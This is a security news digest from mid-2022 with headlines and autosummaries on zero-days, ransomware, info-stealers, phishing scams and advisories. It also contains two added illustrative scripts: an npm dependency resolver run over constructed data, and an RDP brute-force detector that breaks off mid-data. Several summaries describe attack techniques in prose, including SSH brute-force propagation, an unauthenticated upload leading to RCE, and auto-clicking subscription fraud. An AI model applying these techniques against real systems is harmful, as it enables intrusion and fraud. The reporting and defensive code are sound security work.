                Autosummary: Attack details not revealed: The zero-day bug fixed today (tracked as CVE-2022-2294) is a high severity heap-based buffer overflow weakness in the WebRTC (Web Real-Time Communications) component, reported by Jan Vojtesek of the Avast Threat Intelligence team on Friday, July 1.


                Cyberattacks: A very real existential threat to organizations

                ciber
                2022-07-04 https://www.welivesecurity.com/2022/07/04/cyberattacks-real-existential-threat-organizations/

                One in five organizations have teetered on the brink of insolvency after a cyberattack. Can your company keep hackers at bay?

                The post Cyberattacks: A very real existential threat to organizations appeared first on WeLiveSecurity

                "

                Autosummary: Several best practices are highlighted, including the following:
                - Formalize cybersecurity with clearly defined roles and board or senior management buy-in
                - Ensure top execs have clear visibility into and engagement with cybersecurity
                - Follow best practice standards such as the US National Institute of Standards and Technology (NIST) framework
                - Spread investment over NIST's five key functions: identify, protect, detect, respond and recover
                - Focus on incident response planning and attack simulations in light of current geopolitical uncertainty
                - Regularly assess corporate data and technology infrastructure
                - Provide effective cybersecurity awareness training
                - Ensure business suppliers and partners adhere to security requirements
                - Focus on "low-hanging fruit" processes such as patching, pentesting and regular backups
                Taken together, these steps will help minimize the chances of an attack ultimately bankrupting the organization. According to the report, the main vectors for attack are: cloud servers (41%), business email (40%), corporate servers (37%), remote access servers (31%), employee-owned mobile devices (29%) and DDoS (26%). This chimes with the findings of other reports and the narrative that remote working, pandemic-related investments in cloud infrastructure and remote working security challenges are some of the biggest risks facing organizations today. "


                Google fixes the fourth Chrome zero-day in 2022

                exploits
                2022-07-04 https://securityaffairs.co/wordpress/132863/hacking/4th-chrome-zero-day.html

                Google addressed a high-severity zero-day Chrome vulnerability actively exploited in the wild, it is the fourth zero-day patched in 2022. Google has released Chrome 103.0.5060.114 for Windows to fix a high-severity zero-day Chrome vulnerability, tracked as CVE-2022-2294, which is actively exploited in the wild. The flaw is a heap buffer overflow that resides in the […]

                The post Google fixes the fourth Chrome zero-day in 2022 appeared first on Security Affairs.

                "

                Autosummary: "


                Half of actively exploited zero-day issues in H1 2022 are variants of previous flaws

                exploits
                2022-07-03 https://securityaffairs.co/wordpress/132813/security/h1-2022-zero-day-variants-previous-flaws.html

                Google Project Zero states that in H1 2022 at least half of the zero-day issues exploited in attacks were variants of improperly fixed older flaws. Google Project Zero researcher Maddie Stone published a blog post that summarizes her talk at the FIRST conference in June 2022, titled “0-day In-the-Wild Exploitation in 2022…so […]

                The post Half of actively exploited zero-day issues in H1 2022 are variants of previous flaws appeared first on Security Affairs.

                "

                Autosummary: Stone revealed that nine out of 18 zero-day flaws detected and disclosed as exploited in-the-wild in 2022 are variants of previously patched vulnerabilities “As of June 15, 2022, there have been 18 0-days detected and disclosed as exploited in-the-wild in 2022. "


                Dozens of Jenkins plugins are affected by zero-day vulnerabilities

                exploits
                2022-07-03 https://securityaffairs.co/wordpress/132836/security/jenkins-plugins-zero-day-flaws.html

                The Jenkins security team disclosed dozens of flaws affecting 29 plugins for the Jenkins automation server, most of them yet to be patched. Jenkins is the most popular open-source automation server; it is maintained by CloudBees and the Jenkins community. The automation server helps developers build, test and deploy their applications, and it has hundreds of thousands […]

                The post Dozens of Jenkins plugins are affected by zero-day vulnerabilities appeared first on Security Affairs.

                "

                Autosummary: "


                Resecurity’s cybersecurity solutions now available in the Microsoft Azure marketplace

                ciber
                2022-07-02 https://www.helpnetsecurity.com/2022/07/02/resecurity-microsoft-azure/

                Resecurity announced its award-winning cybersecurity threat intelligence and risk monitoring platform is now available on Microsoft’s Azure Marketplace. Microsoft’s Azure Marketplace is the most comprehensive marketplace on the planet, offering thousands of certified cloud applications and software to over four million active users and subscribers. With cyber-risk ranking as a top concern for CEOs and business owners, enterprises are looking for additional support to secure and manage the evolving cyber threatscape. More importantly, they’re looking … More

                The post Resecurity’s cybersecurity solutions now available in the Microsoft Azure marketplace appeared first on Help Net Security.

                "

                Autosummary: Microsoft Azure users who integrate Resecurity into their cybersecurity strategy will benefit from: around-the-clock security monitoring of your cloud workloads and enterprise ecosystem; in-depth risk evaluation of the entire enterprise ecosystem (Dark Web, compromised accounts, data leaks, network hygiene, cloud security, etc.); a scalable software solution that can monitor a digital footprint of any size (domains, network ranges, cloud-based nodes); AI-powered threat intelligence that leverages Resecurity's Dark Web intelligence repositories with over 3.4 billion records and cyber intelligence analysts deployed across all continents; and contextualized risk alerts and data-backed suggested actions to enable a proactive security strategy. "


                A ransomware attack forced publishing giant Macmillan to shut down its systems

                exploits ransomware
                2022-07-02 https://securityaffairs.co/wordpress/132792/cyber-crime/macmillan-ransomware-attack.html

                A cyber attack forced the American publishing giant Macmillan to shut down its IT systems. The publishing giant Macmillan has been hit by a cyberattack that forced the company to shut down its IT infrastructure to prevent the threat from spreading within its network. Company spokesperson Erin Coffey told different media outlets that attackers have encrypted […]

                The post A ransomware attack forced publishing giant Macmillan to shut down its systems appeared first on Security Affairs.

                "

                Autosummary: "


                Rogue HackerOne employee steals bug reports to sell on the side

                exploits
                2022-07-02 https://www.bleepingcomputer.com/news/security/rogue-hackerone-employee-steals-bug-reports-to-sell-on-the-side/
                A HackerOne employee stole vulnerability reports submitted through the bug bounty platform and disclosed them to affected customers to claim financial rewards. [...] "

                Autosummary: Less than 24 hours after starting the investigation, the bug bounty platform identified the threat actor, terminated their system access, and remotely locked their laptop pending the inquiry. "


                Experts shared PoC exploit code for RCE in Zoho ManageEngine ADAudit Plus tool

                exploits
                2022-07-02 https://securityaffairs.co/wordpress/132797/hacking/zoho-manageengine-adaudit-plus-rce.html

                Researchers shared technical details and proof-of-concept exploit code for the CVE-2022-28219 flaw in Zoho ManageEngine ADAudit Plus tool. Security researchers from Horizon3.ai have published technical details and proof-of-concept exploit code for a critical vulnerability, tracked as CVE-2022-28219 (CVSS 9.8 out of 10), in the Zoho ManageEngine ADAudit Plus tool. The tool allows monitoring activities of […]

                The post Experts shared PoC exploit code for RCE in Zoho ManageEngine ADAudit Plus tool appeared first on Security Affairs.

                "

                Autosummary: Security researchers from Horizon3.ai have published technical details and proof-of-concept exploit code for a critical vulnerability, tracked as CVE-2022-28219 (CVSS 9.8 out of 10), in the Zoho ManageEngine ADAudit Plus tool. "


                Amazon Quietly Patches "High Severity" Vulnerability in Android Photos App

                exploits
                2022-07-01 https://thehackernews.com/2022/07/amazon-quietly-patches-high-severity.html
                Amazon, in December 2021, patched a high severity vulnerability affecting its Photos app for Android that could have been exploited to steal a user's access tokens. "The Amazon access token is used to authenticate the user across multiple Amazon APIs, some of which contain personal data such as full name, email, and address," Checkmarx researchers João Morais and Pedro Umbelino said. "Others, "

                Autosummary: "


                Microsoft Warns of Cryptomining Malware Campaign Targeting Linux Servers

                exploits
                2022-07-01 https://thehackernews.com/2022/06/microsoft-warns-of-cryptomining-malware.html
                A cloud threat actor group tracked as 8220 has updated its malware toolset to breach Linux servers with the goal of installing crypto miners as part of a long-running campaign. "The updates include the deployment of new versions of a crypto miner and an IRC bot," Microsoft Security Intelligence said in a series of tweets on Thursday. "The group has actively updated its techniques and payloads "

                Autosummary: Besides achieving persistence by means of a cron job, the "loader uses the IP port scanner tool "masscan" to find other SSH servers in the network, and then uses the GoLang-based SSH brute force tool "spirit" to propagate," Microsoft said. "


                Jenkins discloses dozens of zero-day bugs in multiple plugins

                exploits
                2022-07-01 https://www.bleepingcomputer.com/news/security/jenkins-discloses-dozens-of-zero-day-bugs-in-multiple-plugins/
                On Thursday, the Jenkins security team announced 34 security vulnerabilities affecting 29 plugins for the Jenkins open source automation server, 29 of the bugs being zero-days still waiting to be patched. [...] "

                Autosummary: "


                Solving the indirect vulnerability enigma - fixing indirect vulnerabilities without breaking your dependency tree

                exploits
                2022-07-01 https://thehackernews.com/2022/07/solving-indirect-vulnerability-enigma.html
                Fixing indirect vulnerabilities is one of those complex, tedious and, quite frankly, boring tasks that no one really wants to touch. No one except for Debricked, it seems. Sure, there are lots of ways to do it manually, but can it be done automatically with minimal risk of breaking changes? The Debricked team decided to find out.  A forest full of fragile trees So, where do you even start? "

                Autosummary: This means that the contributors of `mkdirp` have come to the conclusion that they are not compatible with newer versions of `minimist`, and forcing the update of `minimist` may introduce breaking changes between `mkdirp` and `minimist`. To perform this update, simply run `npm update`, delete your `package-lock.json` file, and run `npm install`. So, the million-dollar question is: what version of `mocha` should be used that in turn trickles down to a safe version of `minimist` without breaking the dependency tree? "
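
As an added illustration of the resolution problem the summary describes (this is example code written for this page, not Debricked's tooling or the article's own code), the script below models a toy npm registry and searches for the lowest version of a direct dependency whose resolved tree no longer contains a vulnerable transitive package. The package names mirror the article's `mocha` / `mkdirp` / `minimist` chain, but every version number and dependency range in `REGISTRY` is constructed for the example and is not real registry data; the semver helpers are deliberately minimal and cover only exact pins, caret ranges and `<` upper bounds.

```javascript
// Added example, not code from the Debricked article. It models the situation
// the article describes: a direct dependency (mocha) pulls in mkdirp, which
// pins a vulnerable minimist. Instead of force-overriding minimist (and
// breaking mkdirp), find the LOWEST version of the direct dependency whose
// resolved tree no longer contains a vulnerable transitive version.
// Every version number and range in REGISTRY is constructed for this example;
// it is not real npm metadata.

// Minimal semver helpers so the example has no external dependencies.
const parse = (v) => v.split('.').map(Number);

function cmpVersions(a, b) {
  const [pa, pb] = [parse(a), parse(b)];
  for (let i = 0; i < 3; i += 1) {
    if (pa[i] !== pb[i]) return pa[i] - pb[i];
  }
  return 0;
}

// Ranges supported: exact pin "1.2.5", caret "^x.y.z" (npm semantics: same
// major, or same major.minor when the major is 0) and upper bound "<x.y.z".
function satisfies(version, range) {
  if (range.startsWith('^')) {
    const base = range.slice(1);
    const [v, b] = [parse(version), parse(base)];
    const sameLine = b[0] === 0 ? v[0] === 0 && v[1] === b[1] : v[0] === b[0];
    return sameLine && cmpVersions(version, base) >= 0;
  }
  if (range.startsWith('<')) return cmpVersions(version, range.slice(1)) < 0;
  return version === range;
}

// Constructed toy registry: name -> version -> { dependency: range }.
const REGISTRY = {
  minimist: { '1.2.5': {}, '1.2.6': {} },
  mkdirp: {
    '0.5.5': { minimist: '1.2.5' },   // exact pin on the vulnerable version
    '0.5.6': { minimist: '^1.2.6' },  // maintainers moved to the fixed line
    '1.0.4': {},                      // dependency dropped entirely
  },
  mocha: {
    '7.1.0': { mkdirp: '0.5.5' },
    '7.2.0': { mkdirp: '^0.5.5' },
    '8.0.0': { mkdirp: '^1.0.4' },
  },
};

// npm-style resolution: the highest published version that satisfies the range.
function resolve(name, range) {
  const matching = Object.keys(REGISTRY[name] || {})
    .filter((v) => satisfies(v, range))
    .sort(cmpVersions);
  return matching.length ? matching[matching.length - 1] : null;
}

// Depth-first walk of the resolved tree; returns every node with its path.
function walk(name, version, path = [], out = []) {
  const here = [...path, `${name}@${version}`];
  out.push({ name, version, path: here });
  for (const [dep, range] of Object.entries(REGISTRY[name][version])) {
    const resolved = resolve(dep, range);
    if (resolved) walk(dep, resolved, here, out);
  }
  return out;
}

// Paths from the direct dependency down to any vulnerable version of vulnName.
function vulnerablePaths(rootName, rootVersion, vulnName, vulnRange) {
  return walk(rootName, rootVersion)
    .filter((n) => n.name === vulnName && satisfies(n.version, vulnRange))
    .map((n) => n.path.join(' > '));
}

// Lowest version of the direct dependency whose tree is clean: the smallest
// upgrade, hence the least breaking-change risk.
function lowestSafeVersion(directName, vulnName, vulnRange) {
  const candidates = Object.keys(REGISTRY[directName]).sort(cmpVersions);
  return candidates.find(
    (v) => vulnerablePaths(directName, v, vulnName, vulnRange).length === 0,
  ) || null;
}

console.log(vulnerablePaths('mocha', '7.1.0', 'minimist', '<1.2.6'));
console.log('lowest safe mocha:', lowestSafeVersion('mocha', 'minimist', '<1.2.6'));
```

Run with `node`: it prints the single vulnerable path under mocha 7.1.0 (`mocha@7.1.0 > mkdirp@0.5.5 > minimist@1.2.5`) and reports 7.2.0 as the lowest clean version, because 7.2.0's caret range lets mkdirp resolve to 0.5.6, which in turn pulls the fixed minimist line. Applied to a real lockfile, the same search is what lets you pick a root upgrade rather than override the transitive version and break the intermediate package.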


                FTC warns LGBTQ+ community of extortion scams targeting them on dating apps

                financial
                2022-07-01 https://www.bitdefender.com/blog/hotforsecurity/ftc-warns-lgbtq-community-of-extortion-scams-targeting-them-on-dating-apps/
                Members of the LGBTQ+ community have been warned to be on their guard against extortionists who may attempt to prey on them via online dating apps such as Grindr and Feeld. Read more in my article on the Hot for Security blog. "

                Autosummary: But whereas a typical romance scammer may pursue a line of "I-love-you-please-send-me-money-to-pay-for-my-mothers-urgent-surgery", the scams that the FTC is warning about take a different approach. "


                Microsoft Warns About Evolving Capabilities of Toll Fraud Android Malware Apps

                exploits
                2022-07-01 https://thehackernews.com/2022/07/microsoft-warns-about-evolving.html
                Microsoft has detailed the evolving capabilities of toll fraud malware apps on Android, pointing out its "complex multi-step attack flow" and an improved mechanism to evade security analysis. Toll fraud belongs to a category of billing fraud wherein malicious mobile applications come with hidden subscription fees, roping in unsuspecting users to premium content without their knowledge or consent "

                Autosummary: The JavaScript code, for its part, is designed to click on HTML elements that contain keywords such as "confirm," "click," and "continue" to programmatically initiate the subscription. "


                Zoho ManageEngine ADAudit Plus bug gets public RCE exploit

                exploits
                2022-07-01 https://www.bleepingcomputer.com/news/security/zoho-manageengine-adaudit-plus-bug-gets-public-rce-exploit/
                Security researchers have published technical details and proof-of-concept exploit code for CVE-2022-28219, a critical vulnerability in the Zoho ManageEngine ADAudit Plus tool for monitoring activities in the Active Directory. [...] "

                Autosummary: Bypassing authentication, stealing logins: Once Sunkavally found a way to execute code remotely, he started to look for methods to upload files without authentication and found that some ADAudit Plus endpoints used by agents running on the machine to upload security events did not require authentication. "


                The Week in Ransomware - July 1st 2022 - Bug Bounties

                exploits ransomware
                2022-07-01 https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-july-1st-2022-bug-bounties/
                It has been relatively busy this week with new ransomware attacks unveiled, a bug bounty program introduced, and new tactics used by the threat actors to distribute their encryptors. [...] "

                Autosummary: Contributors and those who provided new ransomware information and stories this week include: @PolarToffee, @fwosar, @struppigel, @BleepinComputer, @serghei, @Ionut_Ilascu, @DanielGallagher, @malwrhunterteam, @LawrenceAbrams, @VK_Intel, @billtoulas, @jorntvdw, @malwareforme, @FourOctets, @demonslay335, @Seifreed, @ReversingLabs, @ValeryMarchive, @TrendMicro, @kisa118, @ahnlab, @PogoWasRight, @Amigo_A_, @Kangxiaopao, and @pcrisk. Finally, we also learned about various attacks this week, including those on Macmillan, Fitzgibbon Hospital, Med. "


                CISA orders agencies to patch Windows LSA bug exploited in the wild

                exploits
                2022-07-01 https://www.bleepingcomputer.com/news/security/cisa-orders-agencies-to-patch-windows-lsa-bug-exploited-in-the-wild/
                CISA has re-added a security bug affecting Windows devices to its list of bugs exploited in the wild after removing it in May due to Active Directory (AD) certificate authentication issues caused by Microsoft's May 2022 updates. [...] "

                Autosummary: "


                AstraLocker 2.0 ransomware isn’t going to give you your files back

                exploits ransomware
                2022-07-01 https://blog.malwarebytes.com/ransomware/2022/07/astralocker-2-0-ransomware-isnt-going-to-give-you-your-files-back/

                Through malice or carelessness, AstraLocker breaks the "circle of trust".

                The post AstraLocker 2.0 ransomware isn’t going to give you your files back appeared first on Malwarebytes Labs.

                "

                Autosummary: Reaffirming (and then breaking) the circle of trust: When decryption doesn’t happen, either because of a poor quality decryptor, or because no decryption process actually exists, the ransomware author’s so-called circle of trust is broken. In a ransomware attack, criminals typically break into a victim’s network via a trojan that has already infected a computer, by exploiting a software vulnerability on an Internet-facing server, or with stolen Remote Desktop Protocol (RDP) credentials. In its rush to encrypt, AstraLocker still manages to do some standard ransomware things: it tries to disable security programs; it also stops applications running that might prevent encryption from taking place; and it avoids virtual machines, which might indicate it’s being run by researchers in a lab. "


                Watch out for survey scams – Week in security with Tony Anscombe

                financial
                2022-07-01 https://www.welivesecurity.com/videos/watch-out-survey-scams-week-security-tony-anscombe/

                As scammers continue to ask people to take fake surveys, can you recognize some common telltale signs you're dealing with a scam?

                The post Watch out for survey scams – Week in security with Tony Anscombe appeared first on WeLiveSecurity

                "

                Autosummary: "


                Phishing scam poses as Canadian tax agency before Canada Day

                financial
                2022-07-01 https://www.welivesecurity.com/2022/07/01/phishing-scam-posing-canadian-tax-agency-canada-day/

                The lead-up to the Canada Day festivities has brought a tax scam with it

                The post Phishing scam poses as Canadian tax agency before Canada Day appeared first on WeLiveSecurity

                "

                Autosummary: But there are other popular contenders for phishing lures, such as fake Facebook and WhatsApp login pages and websites masquerading as email services and gaming platforms: Although, in this case, the malicious operators targeted the credit card and personal information of Canadians, phishing can encompass a variety of goals like ransomware downloads, banking trojans, cryptojacking malware, and botnet deployments. "


                Ransomware review: June 2022

                exploits
                2022-07-01 https://blog.malwarebytes.com/threat-intelligence/2022/07/ransomware-review-june-2022/

                LockBit remained the most active threat in June, and “the costliest strain of ransomware ever documented” went dark while others surged.

                The post Ransomware review: June 2022 appeared first on Malwarebytes Labs.

                "

                Autosummary: [Figures: Known attacks involving Conti compared to known attacks involving alleged Conti “brands” BlackBasta, BlackByte, and KaraKurt; The resurgent KaraKurt extortion group has a new leak site; Known ransomware attacks by group, by country and by industry sector, June 2022] Trends: Most software, even malware, trends towards “feature completeness”, a point where adding new features adds little, if anything, to its usefulness. LockBit: Without fanfare, LockBit has become the dominant force in ransomware this year. Conti: As expected, the last public vestige of the Conti ransomware gang, its leak site, disappeared in June, after a few weeks of inactivity. "


                NXM Autonomous Security platform protects space infrastructure and IoT devices from cyberattacks

                industry ciber
                2022-07-01 https://www.helpnetsecurity.com/2022/07/01/nxm-autonomous-security-platform/

                NXM Labs unveiled its NXM Autonomous Security platform that prevents hackers from gaining unauthorized access to commercial, industrial, medical, or consumer internet of things (IoT) devices. Tested in collaboration with the Jet Propulsion Laboratory (JPL), California Institute of Technology (Caltech), NXM successfully demonstrated the ability of its technology to enable future Mars rovers to automatically defend themselves and recover from cyberattacks. Caltech manages JPL on behalf of the National Aeronautics and Space Administration (NASA). NXM’s … More

                The post NXM Autonomous Security platform protects space infrastructure and IoT devices from cyberattacks appeared first on Help Net Security.

                "

                Autosummary: "


                EMEA continues to be a hotspot for malware threats

                exploits ransomware
                2022-06-30 https://www.helpnetsecurity.com/2022/06/30/emea-malware-threats/

                Ransomware detections in the first quarter of this year doubled the total volume reported for 2021, according to the latest quarterly Internet Security Report from the WatchGuard Threat Lab. Researchers also found that the Emotet botnet came back in a big way, the infamous Log4Shell vulnerability tripled its attack efforts and malicious cryptomining activity increased. Although findings from the Threat Lab’s Q4 2021 report showed ransomware attacks trending down year over year, that all changed … More

                The post EMEA continues to be a hotspot for malware threats appeared first on Help Net Security.

                "

                Autosummary: Other key findings from this Internet Security Report include: Log4Shell makes its debut on the top 10 network attacks list: Publicly disclosed in early December 2021, the Apache Log4j2 vulnerability, also known as Log4Shell, debuted on the top 10 network attack list fashionably late this quarter. “Based on the early spike in ransomware this year and data from previous quarters, we predict 2022 will break our record for annual ransomware detections,” said Corey Nachreiner, chief security officer at WatchGuard. "


                YTStealer info-stealing malware targets YouTube content creators

                exploits
                2022-06-30 https://securityaffairs.co/wordpress/132743/malware/ytstealer-malware-dark-web.html

                Researchers detailed a new information-stealing malware, dubbed YTStealer, that targets YouTube content creators. Intezer cybersecurity researchers have detailed a new information-stealing malware, dubbed YTStealer, that was developed to steal authentication cookies from YouTube content creators. The malware is highly likely available as a service on the Dark Web. Upon executing the malware, it performs some environment […]

                The post YTStealer info-stealing malware targets YouTube content creators appeared first on Security Affairs.

                "

                Autosummary: Once it has gained access to YouTube Studio, the malware grabs information about the user’s channels, including the channel name, the number of subscribers, the creation date, verification status and whether the channel is monetized. A lot of the droppers are disguised as installers for legitimate video editing software, such as Adobe Premiere Pro, Filmora, and HitFilm Express; audio tools like Ableton Live 11 and FL Studio; game mods for Counter-Strike: Global Offensive and Call of Duty; and cracked versions of security products. "


                OpenSea discloses data breach, warns users of phishing attacks

                financial
                2022-06-30 https://www.bleepingcomputer.com/news/security/opensea-discloses-data-breach-warns-users-of-phishing-attacks/
                OpenSea, the largest non-fungible token (NFT) marketplace, disclosed a data breach on Wednesday and warned users of phishing attacks that could target them in the coming days. [...] "

                Autosummary: The company"s Head Of Security, Cory Hardman, said that an employee of Customer.io, the platform"s email delivery vendor, downloaded email addresses belonging to OpenSea users and newsletter subscribers. "


                Smashing Security podcast #281: Debug ransomware and win $1,000,000, period-tracking apps, and AI gets emotional

                exploits ransomware
                2022-06-30 https://grahamcluley.com/smashing-security-podcast-281/
                A new version of the LockBit ransomware offers a bug bounty, women uninstall period-tracking apps in fear of how their data might be used against them, and Microsoft's facial recognition tech no longer wants to know how you're feeling. All this and much more is discussed in the latest edition of the award-winning "Smashing Security" podcast by computer security veterans Graham Cluley and Carole Theriault, joined this week by Thom Langford from The Host Unknown podcast. Plus don't miss our featured interview with Bitwarden founder and CTO Kyle Spearrin. "

                Autosummary: Integrating directly into development tools, workflows, and automation pipelines, Snyk makes it easy for teams to find, prioritize, and fix security vulnerabilities in code, dependencies, containers, and infrastructure as code. "


                Ex-Canadian Government Employee Pleads Guilty Over NetWalker Ransomware Attacks

                exploits government ransomware
                2022-06-30 https://thehackernews.com/2022/06/ex-canadian-government-employee-pleads.html
                A former Canadian government employee this week agreed to plead guilty in the U.S. to charges related to his involvement with the NetWalker ransomware syndicate. Sebastien Vachon-Desjardins, who was extradited to the U.S. on March 10, 2022, is accused of conspiracy to commit computer fraud and wire fraud, intentional damage to a protected computer, and transmitting a demand in relation to "

                Autosummary: "


                A Guide to Surviving a Ransomware Attack

                exploits ransomware
                2022-06-30 https://threatpost.com/a-guide-to-surviving-a-ransomware-attack/180110/
                Oliver Tavakoli, CTO at Vectra AI, gives us hope that surviving a ransomware attack is possible, so long as we apply preparation and intentionality to our defense posture. "

                Autosummary: Attacker Skill and Persistence: The skills of the attackers and the skills of the defenders, plus some elements of luck, generally determine the possible extent to which an attack could progress:
                - Low skills: Some attackers may be skilled at attacking organizations with lagging security practices but will often meet their match in organizations that have robust defenses
                - Wrong skills: Attackers with skills and tooling useful in attacking traditional data centers will have trouble breaking into targets who have moved everything to the cloud
                - Bad luck: Organizations who are generally locked down but may have a temporary exposure which an attacker happens to stumble across
                - Good luck: Organizations who have left a persistent opening (e.g., open RDP access to the outside in an AWS enclave) may have a run of good luck as no attacker encounters it
                Attacker Goal: Attack groups may also specialize in leak-centered vs. operation-centered goals. Takeaways: You should tabletop various scenarios covering attackers pursuing both leak-centered and operations-centered goals and consider your reactions to partial and complete success by the attackers. Know the extent of your cyber insurance policy and what limitations it has. "


                Costco 40th anniversary scam targets WhatsApp users

                financial
                2022-06-30 https://www.welivesecurity.com/2022/06/30/costco-40th-anniversary-scam-targets-whatsapp-users/

                If the promise of a cash prize in return for answering a few questions sounds like a deal that is too good to be true, that’s because it is

                The post Costco 40th anniversary scam targets WhatsApp users appeared first on WeLiveSecurity

                "

                Autosummary: Keep away from parent Costco surveys, giveaways or out-of-the-blue and too-good-to-be-true offers, even if the links are shared by trusted contacts. For example, the website set up by the scammers features glowing reviews and feedback from past “winners”, which, again, is not an unusual sight in these types of social engineering campaigns. "


                XFiles info-stealing malware adds support for Follina delivery

                exploits
                2022-06-30 https://www.bleepingcomputer.com/news/security/xfiles-info-stealing-malware-adds-support-for-follina-delivery/
                The XFiles info-stealer malware has added a delivery module that exploits CVE-2022-30190, aka Follina, for dropping the payload on target computers. [...] "

                Autosummary: [Figure: The resulting shellcode (Cyberint)] After the infection process has been completed, XFiles begins typical info-stealer operations: targeting cookies, passwords, and history stored in web browsers, cryptocurrency wallets, taking screenshots, and looking for Discord and Telegram credentials. "


                ZuoRAT is a sophisticated malware that mainly targets SOHO routers

                exploits
                2022-06-30 https://blog.malwarebytes.com/reports/2022/06/zuorat-is-a-sophisticated-malware-that-mainly-targets-soho-routers/

                Researchers have analyzed a long running campaign that compromises SOHO routers to further penetrate and eavesdrop on networks.

                The post ZuoRAT is a sophisticated malware that mainly targets SOHO routers appeared first on Malwarebytes Labs.

                "

                Autosummary: The so-called ZuoRAT campaign, which very likely started in 2020, is so sophisticated that the researchers suspect that there is a state-sponsored threat actor behind it. The researchers identified infected routers of several manufacturers including popular brands like ASUS, Cisco, DrayTek, and NETGEAR. "


                Amazon Photos vulnerability could have given attackers access to user files and data

                exploits
                2022-06-30 https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/06/amazon-photos-vulnerability-could-have-given-attackers-access-to-user-files-and-data/

                The retail giant patched a serious flaw in its Amazon Photos app that left user access token exposed to potential attackers.

                The post Amazon Photos vulnerability could have given attackers access to user files and data appeared first on Malwarebytes Labs.

                "

                Autosummary: That would give attackers access to a trove of information, since many of these APIs contain personal data, such as names, email addresses, and home addresses. "


                Black Basta ransomware – what you need to know

                exploits ransomware
                2022-06-30 https://www.tripwire.com/state-of-security/security-data-protection/black-basta-ransomware-what-you-need-to-know/
                Although only active for the past couple of months, the Black Basta ransomware is thought to have already hit almost 50 organisations. Read more in my article on the Tripwire State of Security blog. "

                Autosummary: Victims have reportedly been hit in countries around the world including the United States, UK, India, Canada, Australia, New Zealand, and UAE. "


                NFT marketplace OpenSea warns of data breach that could lead to phishing attacks

                financial
                2022-06-30 https://grahamcluley.com/nft-marketplace-opensea-warns-of-data-breach-that-could-lead-to-phishing-attacks/
                Popular NFT marketplace OpenSea has warned users that they might be targeted with phishing attacks following a data breach that exposed the email addresses of its users and newsletter subscribers. "

                Autosummary: Instead, according to Hardman, an employee of Customer.io – OpenSea’s email delivery vendor – abused their privileges to download OpenSea’s user email and newsletter email lists. In a blog update, OpenSea’s head of security Cory Hardman broke the bad news: “If you have shared your email with OpenSea in the past, you should assume you were impacted.” "


                Ex-Canadian government employee admits to being a member of the Russian cybercrime gang NetWalker

                government
                2022-06-30 https://securityaffairs.co/wordpress/132753/cyber-crime/canadian-member-gang-netwalker-sentenced.html

                A former Canadian government IT worker, Sebastien Vachon-Desjardins, has pleaded guilty in the U.S. to charges related to his involvement with the Russian cybercrime group NetWalker, admitting to being a high-level member of the gang. In March, the man was extradited to the United States to face charges […]

                The post Ex-Canadian government employee admits to being a member of the Russian cybercrime gang NetWalker appeared first on Security Affairs.

                "

                Autosummary: The list of victims of the group is long; it includes Pakistan’s largest private power company K-Electric, Argentina’s official immigration agency, Dirección Nacional de Migraciones, and the University of California San Francisco (UCSF); the latter paid a $1.14 million ransom to recover its files. "


                Macmillan shuts down systems after likely ransomware attack

                exploits ransomware
                2022-06-30 https://www.bleepingcomputer.com/news/security/macmillan-shuts-down-systems-after-likely-ransomware-attack/
                Publishing giant Macmillan was forced to shut down their network and offices while recovering from a security incident that appears to be a ransomware attack. [...] "

                Autosummary: "


                Microsoft Exchange servers worldwide backdoored with new malware

                exploits
                2022-06-30 https://www.bleepingcomputer.com/news/security/microsoft-exchange-servers-worldwide-backdoored-with-new-malware/
                A newly discovered lightweight and persistent malware was used by attackers to backdoor Microsoft Exchange servers belonging to government and military organizations from Europe, the Middle East, Asia, and Africa. [...] "

                Autosummary: After deployment, the malicious IIS module allows its operators to harvest credentials from system memory, collect information from the victims’ network and infected devices, and deliver additional payloads (such as a PowerSploit-based Mimikatz reflective loader, Mimikatz SSP, ProcDump, and a legitimate Avast memory dump tool). "


                AA22-181A: #StopRansomware: MedusaLocker

                exploits
                2022-06-30 https://us-cert.cisa.gov/ncas/alerts/aa22-181a
                Original release date: June 30, 2022

                Summary

                Actions to take today to mitigate cyber threats from ransomware:
                • Prioritize remediating known exploited vulnerabilities.
                • Train users to recognize and report phishing attempts.
                • Enable and enforce multifactor authentication.

                Note: this joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.

                The Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the Department of the Treasury, and the Financial Crimes Enforcement Network (FinCEN) are releasing this CSA to provide information on MedusaLocker ransomware. Observed as recently as May 2022, MedusaLocker actors predominantly rely on vulnerabilities in Remote Desktop Protocol (RDP) to access victims’ networks. The MedusaLocker actors encrypt the victim’s data and leave a ransom note with communication instructions in every folder containing an encrypted file. The note directs victims to provide ransomware payments to a specific Bitcoin wallet address. MedusaLocker appears to operate as a Ransomware-as-a-Service (RaaS) model based on the observed split of ransom payments. Typical RaaS models involve the ransomware developer and various affiliates that deploy the ransomware on victim systems. MedusaLocker ransomware payments appear to be consistently split between the affiliate, who receives 55 to 60 percent of the ransom; and th "

                Autosummary: "
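The advisory names RDP as the access vector and tells defenders to enforce MFA and patch, but does not show what the access attempt looks like in telemetry. The following is an added example, not code or data from the CISA advisory: it runs a small brute-force detector over constructed Windows Security log records (EventID 4625 failed logon, 4624 successful logon, LogonType 10 = RemoteInteractive, i.e. RDP), flags a source IP that fails repeatedly inside a short window, and marks the urgent case where a success follows the burst. The field names, thresholds and IP addresses are assumptions made for the example.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample records shaped like fields pulled from the Windows Security log.
# EventID 4625 = failed logon, 4624 = successful logon; LogonType 10 = RemoteInteractive (RDP).
# Addresses come from documentation ranges; none of this is from the advisory.
SAMPLE_EVENTS = [
    {"time": "2022-05-10T02:14:05", "event_id": 4625, "logon_type": 10, "user": "administrator", "src_ip": "203.0.113.7"},
    {"time": "2022-05-10T02:14:09", "event_id": 4625, "logon_type": 10, "user": "administrator", "src_ip": "203.0.113.7"},
    {"time": "2022-05-10T02:14:14", "event_id": 4625, "logon_type": 10, "user": "admin", "src_ip": "203.0.113.7"},
    {"time": "2022-05-10T02:14:20", "event_id": 4625, "logon_type": 10, "user": "admin", "src_ip": "203.0.113.7"},
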